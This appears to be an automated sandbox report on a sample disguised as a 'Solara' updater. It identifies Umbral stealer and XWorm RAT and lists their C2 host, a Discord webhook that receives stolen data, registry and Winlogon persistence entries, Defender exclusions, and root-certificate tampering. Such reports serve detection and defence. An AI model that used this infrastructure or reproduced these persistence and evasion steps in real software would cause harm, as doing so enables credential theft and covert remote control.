umbral | 4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
19-05-2024 16:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solara_Updater.exe
Size

1.9MB
MD5

f4cffd7e6cca2b88bba1f19120e9255f
SHA1

28df62794d325206d1f61a400b5c5c682632e371
SHA256

4a10203f9773e4a4f5173a3d1840461bed2b6c206e16b47543bb127a541192bf
SHA512

cb71ef2db087c012744fcac05033cab80947131029ae9bf59b57f85dd2f819e859f105919978a2af4334ac4b8f5b060f5f757b6898cb8fddd720a114b652bfe8
SSDEEP

49152:mH4Y2d/Pz0dB5h1qeU2V0ZBsvH1jBOtGQt/3c5DGqHQX+icSr:mH/QPz0d/pV0AvHLDh5HH4+i

Score

10^/10

umbral xworm execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

answer-riverside.gl.at.ply.gg:45691

Attributes

Install_directory
%AppData%
install_file
svhost.exe

Extracted

Family

umbral

https://discordapp.com/api/webhooks/1239665745831530598/iJT0OELt4O4igXW_VMu-CUIfcqaawXLhyC4Bruuv1t2x0XOvC0_p9dc-G_RxJMO7fn-V

Signatures

Detect Umbral payload 7 IoCs

resource	yara_rule
behavioral1/files/0x0008000000014509-101.dat	family_umbral
behavioral1/memory/1796-105-0x0000000001120000-0x0000000001160000-memory.dmp	family_umbral
behavioral1/memory/2852-291-0x00000000001E0000-0x0000000000220000-memory.dmp	family_umbral
behavioral1/memory/1472-374-0x0000000001280000-0x00000000012C0000-memory.dmp	family_umbral
behavioral1/memory/2572-485-0x0000000000D70000-0x0000000000DB0000-memory.dmp	family_umbral
behavioral1/memory/1492-534-0x00000000000D0000-0x0000000000110000-memory.dmp	family_umbral
behavioral1/memory/2060-614-0x00000000008D0000-0x0000000000910000-memory.dmp	family_umbral

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/memory/3028-96-0x0000000000B40000-0x0000000000B56000-memory.dmp	family_xworm
behavioral1/files/0x0010000000014471-95.dat	family_xworm
behavioral1/memory/2796-362-0x0000000000070000-0x0000000000086000-memory.dmp	family_xworm
behavioral1/memory/1728-590-0x0000000000030000-0x0000000000046000-memory.dmp	family_xworm

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\winlogon.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\winlogon.exe\", \"C:\\Windows\\system\\wscript.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\winlogon.exe\", \"C:\\Windows\\system\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\sppsvc.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\winlogon.exe\", \"C:\\Windows\\system\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\wscript.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\winlogon.exe\", \"C:\\Windows\\system\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\System.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\winlogon.exe\", \"C:\\Windows\\system\\wscript.exe\", \"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\sppsvc.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\System.exe\", \"C:\\hostNet\\bridgeblockportComBroker.exe\""	bridgeblockportComBroker.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2936	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1728	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2984	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2920	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1732	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2892	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2868	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2616	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1152	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2108	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	352	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2608	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2496	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1552	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2972	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2864	3068	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	964	3068	schtasks.exe	32

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1940	powershell.exe
1068	powershell.exe
576	powershell.exe
1752	powershell.exe
2980	powershell.exe
2752	powershell.exe
1508	powershell.exe
2248	powershell.exe
2904	powershell.exe

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	RustCheat.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk	XClient.exe

Executes dropped EXE 64 IoCs

pid	Process
2108	Loader.exe
1208	sol.exe
2572	Loader.exe
3024	sol.exe
2916	Loader.exe
1572	sol.exe
1624	Loader.exe
2508	sol.exe
1200	Loader.exe
2020	sol.exe
604	Loader.exe
2912	sol.exe
2384	Loader.exe
1536	sol.exe
296	Loader.exe
2936	sol.exe
2992	Loader.exe
1592	sol.exe
2760	Loader.exe
2920	sol.exe
3028	XClient.exe
2880	Loader.exe
1796	RustCheat.exe
2900	sol.exe
380	Loader.exe
1100	sol.exe
2488	bridgeblockportComBroker.exe
1312	bridgeblockportComBroker.exe
1276	Loader.exe
1592	sol.exe
556	bridgeblockportComBroker.exe
1636	Loader.exe
2824	sol.exe
2992	bridgeblockportComBroker.exe
1716	Loader.exe
2548	sol.exe
2856	Loader.exe
2084	bridgeblockportComBroker.exe
992	sol.exe
1572	bridgeblockportComBroker.exe
1308	Loader.exe
2704	sol.exe
588	bridgeblockportComBroker.exe
2860	Loader.exe
2280	sol.exe
340	bridgeblockportComBroker.exe
2060	Loader.exe
2776	sol.exe
1644	bridgeblockportComBroker.exe
760	Loader.exe
3036	sol.exe
1344	bridgeblockportComBroker.exe
2972	XClient.exe
2492	RustCheat.exe
2428	Loader.exe
2708	sol.exe
2404	bridgeblockportComBroker.exe
1728	Loader.exe
948	sol.exe
2588	bridgeblockportComBroker.exe
1744	Loader.exe
1388	sol.exe
2788	bridgeblockportComBroker.exe
2676	Loader.exe

Loads dropped DLL 57 IoCs

pid	Process
912	cmd.exe
912	cmd.exe
1948	cmd.exe
1832	cmd.exe
2732	cmd.exe
2600	cmd.exe
1980	cmd.exe
1596	cmd.exe
2976	cmd.exe
2148	cmd.exe
1060	cmd.exe
1960	cmd.exe
1664	cmd.exe
2104	cmd.exe
2620	cmd.exe
808	cmd.exe
944	cmd.exe
2900	cmd.exe
2868	cmd.exe
2300	cmd.exe
1652	cmd.exe
1924	cmd.exe
3048	cmd.exe
2572	cmd.exe
556	cmd.exe
2276	cmd.exe
2392	cmd.exe
852	cmd.exe
1444	cmd.exe
2000	cmd.exe
1652	cmd.exe
2740	cmd.exe
2500	cmd.exe
2752	cmd.exe
2812	cmd.exe
744	cmd.exe
1148	cmd.exe
1732	cmd.exe
2520	cmd.exe
1724	cmd.exe
2248	cmd.exe
1292	cmd.exe
772	cmd.exe
888	cmd.exe
1532	cmd.exe
1580	cmd.exe
1576	cmd.exe
2084	cmd.exe
2728	cmd.exe
2492	cmd.exe
2204	cmd.exe
912	cmd.exe
2984	cmd.exe
2708	cmd.exe
2792	cmd.exe
2276	cmd.exe
2112	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\wscript.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\System.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Windows\\system\\wscript.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Windows\\system\\wscript.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\sppsvc.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\wscript.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe"	XClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\hostNet\\winlogon.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\hostNet\\winlogon.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\sppsvc.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\System.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\""	bridgeblockportComBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\""	bridgeblockportComBroker.exe

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ipinfo.io
12	ipinfo.io
15	ip-api.com
27	ip-api.com
39	ip-api.com
50	ip-api.com
58	ip-api.com
2	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\Windows\System32\CSC67B74F05EB6444C0B29EB1143C9BD7.TMP	csc.exe
File created	\??\c:\Windows\System32\ldgalj.exe	csc.exe

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\System.exe	bridgeblockportComBroker.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\System.exe	bridgeblockportComBroker.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\27d1bcfc3c54e0	bridgeblockportComBroker.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\sppsvc.exe	bridgeblockportComBroker.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\0a1fd5f707cd16	bridgeblockportComBroker.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system\wscript.exe	bridgeblockportComBroker.exe
File created	C:\Windows\system\817c8c8ec737a7	bridgeblockportComBroker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 19 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2616	schtasks.exe
2108	schtasks.exe
1552	schtasks.exe
2864	schtasks.exe
1152	schtasks.exe
352	schtasks.exe
2608	schtasks.exe
2936	schtasks.exe
2984	schtasks.exe
2920	schtasks.exe
2892	schtasks.exe
2868	schtasks.exe
1940	schtasks.exe
2496	schtasks.exe
964	schtasks.exe
2728	schtasks.exe
2972	schtasks.exe
1728	schtasks.exe
1732	schtasks.exe

Detects videocard installed 1 TTPs 5 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2376	wmic.exe
1660	wmic.exe
2224	wmic.exe
320	wmic.exe
1540	wmic.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	bridgeblockportComBroker.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	bridgeblockportComBroker.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
2632	PING.EXE
556	PING.EXE
2756	PING.EXE
2068	PING.EXE
784	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe
2488	bridgeblockportComBroker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2108	Loader.exe
Token: SeDebugPrivilege	3028	XClient.exe
Token: SeDebugPrivilege	1796	RustCheat.exe
Token: SeIncreaseQuotaPrivilege	2560	wmic.exe
Token: SeSecurityPrivilege	2560	wmic.exe
Token: SeTakeOwnershipPrivilege	2560	wmic.exe
Token: SeLoadDriverPrivilege	2560	wmic.exe
Token: SeSystemProfilePrivilege	2560	wmic.exe
Token: SeSystemtimePrivilege	2560	wmic.exe
Token: SeProfSingleProcessPrivilege	2560	wmic.exe
Token: SeIncBasePriorityPrivilege	2560	wmic.exe
Token: SeCreatePagefilePrivilege	2560	wmic.exe
Token: SeBackupPrivilege	2560	wmic.exe
Token: SeRestorePrivilege	2560	wmic.exe
Token: SeShutdownPrivilege	2560	wmic.exe
Token: SeDebugPrivilege	2560	wmic.exe
Token: SeSystemEnvironmentPrivilege	2560	wmic.exe
Token: SeRemoteShutdownPrivilege	2560	wmic.exe
Token: SeUndockPrivilege	2560	wmic.exe
Token: SeManageVolumePrivilege	2560	wmic.exe
Token: 33	2560	wmic.exe
Token: 34	2560	wmic.exe
Token: 35	2560	wmic.exe
Token: SeIncreaseQuotaPrivilege	2560	wmic.exe
Token: SeSecurityPrivilege	2560	wmic.exe
Token: SeTakeOwnershipPrivilege	2560	wmic.exe
Token: SeLoadDriverPrivilege	2560	wmic.exe
Token: SeSystemProfilePrivilege	2560	wmic.exe
Token: SeSystemtimePrivilege	2560	wmic.exe
Token: SeProfSingleProcessPrivilege	2560	wmic.exe
Token: SeIncBasePriorityPrivilege	2560	wmic.exe
Token: SeCreatePagefilePrivilege	2560	wmic.exe
Token: SeBackupPrivilege	2560	wmic.exe
Token: SeRestorePrivilege	2560	wmic.exe
Token: SeShutdownPrivilege	2560	wmic.exe
Token: SeDebugPrivilege	2560	wmic.exe
Token: SeSystemEnvironmentPrivilege	2560	wmic.exe
Token: SeRemoteShutdownPrivilege	2560	wmic.exe
Token: SeUndockPrivilege	2560	wmic.exe
Token: SeManageVolumePrivilege	2560	wmic.exe
Token: 33	2560	wmic.exe
Token: 34	2560	wmic.exe
Token: 35	2560	wmic.exe
Token: SeDebugPrivilege	2880	Loader.exe
Token: SeDebugPrivilege	2488	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	1312	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	556	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	2992	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	2084	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	1572	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	588	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	340	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	1644	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	1344	bridgeblockportComBroker.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	2972	XClient.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2072	powershell.exe
Token: SeDebugPrivilege	760	Loader.exe
Token: SeIncreaseQuotaPrivilege	1716	wmic.exe
Token: SeSecurityPrivilege	1716	wmic.exe
Token: SeTakeOwnershipPrivilege	1716	wmic.exe
Token: SeLoadDriverPrivilege	1716	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3016 wrote to memory of 2108	3016	Solara_Updater.exe	28
PID 3016 wrote to memory of 2108	3016	Solara_Updater.exe	28
PID 3016 wrote to memory of 2108	3016	Solara_Updater.exe	28
PID 3016 wrote to memory of 1208	3016	Solara_Updater.exe	29
PID 3016 wrote to memory of 1208	3016	Solara_Updater.exe	29
PID 3016 wrote to memory of 1208	3016	Solara_Updater.exe	29
PID 3016 wrote to memory of 1208	3016	Solara_Updater.exe	29
PID 3016 wrote to memory of 2664	3016	Solara_Updater.exe	30
PID 3016 wrote to memory of 2664	3016	Solara_Updater.exe	30
PID 3016 wrote to memory of 2664	3016	Solara_Updater.exe	30
PID 1208 wrote to memory of 2300	1208	sol.exe	31
PID 1208 wrote to memory of 2300	1208	sol.exe	31
PID 1208 wrote to memory of 2300	1208	sol.exe	31
PID 1208 wrote to memory of 2300	1208	sol.exe	31
PID 2664 wrote to memory of 2572	2664	Solara_Updater.exe	33
PID 2664 wrote to memory of 2572	2664	Solara_Updater.exe	33
PID 2664 wrote to memory of 2572	2664	Solara_Updater.exe	33
PID 2664 wrote to memory of 3024	2664	Solara_Updater.exe	34
PID 2664 wrote to memory of 3024	2664	Solara_Updater.exe	34
PID 2664 wrote to memory of 3024	2664	Solara_Updater.exe	34
PID 2664 wrote to memory of 3024	2664	Solara_Updater.exe	34
PID 2664 wrote to memory of 2368	2664	Solara_Updater.exe	35
PID 2664 wrote to memory of 2368	2664	Solara_Updater.exe	35
PID 2664 wrote to memory of 2368	2664	Solara_Updater.exe	35
PID 3024 wrote to memory of 2800	3024	sol.exe	36
PID 3024 wrote to memory of 2800	3024	sol.exe	36
PID 3024 wrote to memory of 2800	3024	sol.exe	36
PID 3024 wrote to memory of 2800	3024	sol.exe	36
PID 2368 wrote to memory of 2916	2368	Solara_Updater.exe	37
PID 2368 wrote to memory of 2916	2368	Solara_Updater.exe	37
PID 2368 wrote to memory of 2916	2368	Solara_Updater.exe	37
PID 2368 wrote to memory of 1572	2368	Solara_Updater.exe	38
PID 2368 wrote to memory of 1572	2368	Solara_Updater.exe	38
PID 2368 wrote to memory of 1572	2368	Solara_Updater.exe	38
PID 2368 wrote to memory of 1572	2368	Solara_Updater.exe	38
PID 2368 wrote to memory of 1616	2368	Solara_Updater.exe	39
PID 2368 wrote to memory of 1616	2368	Solara_Updater.exe	39
PID 2368 wrote to memory of 1616	2368	Solara_Updater.exe	39
PID 1572 wrote to memory of 1756	1572	sol.exe	40
PID 1572 wrote to memory of 1756	1572	sol.exe	40
PID 1572 wrote to memory of 1756	1572	sol.exe	40
PID 1572 wrote to memory of 1756	1572	sol.exe	40
PID 1616 wrote to memory of 1624	1616	Solara_Updater.exe	41
PID 1616 wrote to memory of 1624	1616	Solara_Updater.exe	41
PID 1616 wrote to memory of 1624	1616	Solara_Updater.exe	41
PID 1616 wrote to memory of 2508	1616	Solara_Updater.exe	42
PID 1616 wrote to memory of 2508	1616	Solara_Updater.exe	42
PID 1616 wrote to memory of 2508	1616	Solara_Updater.exe	42
PID 1616 wrote to memory of 2508	1616	Solara_Updater.exe	42
PID 1616 wrote to memory of 3036	1616	Solara_Updater.exe	43
PID 1616 wrote to memory of 3036	1616	Solara_Updater.exe	43
PID 1616 wrote to memory of 3036	1616	Solara_Updater.exe	43
PID 2508 wrote to memory of 852	2508	sol.exe	44
